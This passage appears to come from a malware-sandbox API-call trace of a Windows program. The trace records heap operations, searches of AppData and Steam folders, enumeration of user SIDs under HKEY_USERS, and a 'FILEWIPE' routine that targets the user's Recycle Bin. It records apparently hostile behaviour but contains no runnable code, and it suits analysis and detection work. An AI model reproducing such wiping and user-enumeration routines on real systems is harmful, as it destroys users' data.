hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1bc8 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7a8 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a150 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a108 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1c70 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7e8 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a198 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a120 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1d18 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af798 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a240 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a288 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1dc0 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af908 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a210 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a168 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1e78 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af8b8 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a228 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a1f8 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c1f40 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af788 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a258 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a270 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d6220 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af8a8 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a318 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a2a0 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d6318 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af8e8 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a300 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a390 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d63e0 | out: hHeap=0x770000) returned 1 [0044.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af988 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a2e8 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a2d0 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d64a8 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af8c8 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a360 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a2b8 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d6550 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af948 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a378 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a3a8 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7cb118 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af768 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a348 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a330 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7acc88 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af8f8 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a3c0 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88a3f0 | out: hHeap=0x770000) returned 1 [0044.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d4678 | out: hHeap=0x770000) returned 1 [0044.058] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.058] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.058] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af308 [0044.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12d8 [0044.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a00 [0044.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af358 [0044.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af618 [0044.059] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\AppData", lpFindFileData=0x6aefa8 | out: lpFindFileData=0x6aefa8*(dwFileAttributes=0x7, ftCreationTime.dwLowDateTime=0x770000, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x7734e36c, ftLastAccessTime.dwHighDateTime=0x8f90254, ftLastWriteTime.dwLowDateTime=0x37ce11, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x770000, dwReserved1=0x7b45c8, cFileName="츑7", cAlternateFileName="")) returned 0xffffffff [0044.060] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.060] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.060] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af308 [0044.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12d8 [0044.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a00 [0044.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af318 [0044.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af358 [0044.060] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\AppData", lpFindFileData=0x6aefa8 | out: lpFindFileData=0x6aefa8*(dwFileAttributes=0x77019c, ftCreationTime.dwLowDateTime=0x770000, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x7734e36c, ftLastAccessTime.dwHighDateTime=0x8f90254, ftLastWriteTime.dwLowDateTime=0x37ce15, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x770000, dwReserved1=0x8c30255, cFileName="츕7", cAlternateFileName="")) returned 0xffffffff [0044.060] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.060] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.060] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af308 [0044.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af618 [0044.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12d8 [0044.060] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0044.060] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c550 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe88 [0044.061] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afd28 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c520 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afd78 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c538 [0044.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exe", cchCount1=3, lpString2="|", cchCount2=1) returned 3 [0044.061] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afd28 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afd78 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c538 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdc8 [0044.061] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c520 [0044.061] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\Steam\\steamapps\\common", lpFindFileData=0x6aea78 | out: lpFindFileData=0x6aea78*(dwFileAttributes=0x770194, ftCreationTime.dwLowDateTime=0x770000, ftCreationTime.dwHighDateTime=0x777730, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x1d80090, ftLastWriteTime.dwLowDateTime=0x37e695, ftLastWriteTime.dwHighDateTime=0x6cf858, nFileSizeHigh=0x77391ecd, nFileSizeLow=0x74852d, dwReserved0=0xfffffffe, dwReserved1=0x1d60091, cFileName="7웨\x88\x10", cAlternateFileName="")) returned 0xffffffff [0044.061] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1418 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c430 [0044.062] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0044.062] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afed8 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0044.062] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0044.062] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afef8 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af358 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0044.062] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afef8 [0044.062] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7ed268 [0044.062] CharUpperBuffW (in: lpsz="HKEY_USERS", cchLength=0xa | out: lpsz="HKEY_USERS") returned 0xa [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898f8 [0044.062] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe88 [0044.062] RegOpenKeyExW (in: hKey=0x80000003, lpSubKey="", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ae97c | out: phkResult=0x6ae97c*=0x80000003) returned 0x0 [0044.063] RegEnumKeyExW (in: hKey=0x80000003, dwIndex=0x0, lpName=0x6ae9c0, lpcchName=0x6ae980, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x6ae9b8 | out: lpName=".DEFAULT", lpcchName=0x6ae980, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x6ae9b8) returned 0x0 [0044.063] RegCloseKey (hKey=0x80000003) returned 0x0 [0044.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".DEFAULT", cchCount1=8, lpString2="S-1-5-21", cchCount2=8) returned 1 [0044.064] CharUpperBuffW (in: lpsz="HKEY_USERS", cchLength=0xa | out: lpsz="HKEY_USERS") returned 0xa [0044.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c718 [0044.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe38 [0044.064] RegOpenKeyExW (in: hKey=0x80000003, lpSubKey="", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ae97c | out: phkResult=0x6ae97c*=0x80000003) returned 0x0 [0044.064] RegEnumKeyExW (in: hKey=0x80000003, dwIndex=0x1, lpName=0x6ae9c0, lpcchName=0x6ae980, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x6ae9b8 | out: lpName="S-1-5-19", lpcchName=0x6ae980, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x6ae9b8) returned 0x0 [0044.064] RegCloseKey (hKey=0x80000003) returned 0x0 [0044.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S-1-5-19", cchCount1=8, lpString2="S-1-5-21", cchCount2=8) returned 1 [0044.064] CharUpperBuffW (in: lpsz="HKEY_USERS", cchLength=0xa | out: lpsz="HKEY_USERS") returned 0xa [0044.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889580 [0044.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe38 [0044.064] RegOpenKeyExW (in: hKey=0x80000003, lpSubKey="", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ae97c | out: phkResult=0x6ae97c*=0x80000003) returned 0x0 [0044.064] RegEnumKeyExW (in: hKey=0x80000003, dwIndex=0x2, lpName=0x6ae9c0, lpcchName=0x6ae980, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x6ae9b8 | out: lpName="S-1-5-20", lpcchName=0x6ae980, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x6ae9b8) returned 0x0 [0044.064] RegCloseKey (hKey=0x80000003) returned 0x0 [0044.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S-1-5-20", cchCount1=8, lpString2="S-1-5-21", cchCount2=8) returned 1 [0044.064] CharUpperBuffW (in: lpsz="HKEY_USERS", cchLength=0xa | out: lpsz="HKEY_USERS") returned 0xa [0044.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c700 [0044.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe38 [0044.064] RegOpenKeyExW (in: hKey=0x80000003, lpSubKey="", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ae97c | out: phkResult=0x6ae97c*=0x80000003) returned 0x0 [0044.065] RegEnumKeyExW (in: hKey=0x80000003, dwIndex=0x3, lpName=0x6ae9c0, lpcchName=0x6ae980, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x6ae9b8 | out: lpName="S-1-5-21-3388679973-3930757225-3770151564-1000", lpcchName=0x6ae980, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x6ae9b8) returned 0x0 [0044.065] RegCloseKey (hKey=0x80000003) returned 0x0 [0044.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S-1-5-21", cchCount1=8, lpString2="S-1-5-21", cchCount2=8) returned 2 [0044.065] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0044.065] FindFirstFileW (in: lpFileName="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpFindFileData=0x6aec50 | out: lpFindFileData=0x6aec50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0x7ed268 [0044.065] FindClose (in: hFindFile=0x7ed268 | out: hFindFile=0x7ed268) returned 1 [0044.065] CharLowerBuffW (in: lpsz="byte[0]", cchLength=0x7 | out: lpsz="byte[0]") returned 0x7 [0044.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0044.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c6e8 [0044.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af358 [0044.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c640 [0044.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afec8 [0044.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c658 [0044.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe18 [0044.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c5f8 [0044.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe28 [0044.066] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0044.066] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0044.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3e8 [0044.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe68 [0044.066] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0044.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3e8 [0044.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd78 [0044.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0044.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7afe68 [0044.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7afe68, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0044.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe68 | out: hHeap=0x770000) returned 1 [0044.066] GetProcAddress (hModule=0x76b40000, lpProcName="memset") returned 0x76b49790 [0044.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3e8 | out: hHeap=0x770000) returned 1 [0044.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd78 | out: hHeap=0x770000) returned 1 [0044.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0044.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd78 [0044.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe68 [0044.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afdc8 [0044.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd78 | out: hHeap=0x770000) returned 1 [0044.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe68 | out: hHeap=0x770000) returned 1 [0044.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdc8 | out: hHeap=0x770000) returned 1 [0044.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afdc8 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8380 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3e8 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3d0 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c400 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c448 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe68 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c448 | out: hHeap=0x770000) returned 1 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe68 | out: hHeap=0x770000) returned 1 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c400 | out: hHeap=0x770000) returned 1 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c400 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c448 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3a0 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe68 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3a0 | out: hHeap=0x770000) returned 1 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe68 | out: hHeap=0x770000) returned 1 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c448 | out: hHeap=0x770000) returned 1 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c448 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3a0 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3b8 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe68 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3b8 | out: hHeap=0x770000) returned 1 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe68 | out: hHeap=0x770000) returned 1 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3a0 | out: hHeap=0x770000) returned 1 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3a0 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c3b8 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c370 [0044.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe68 [0044.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c370 | 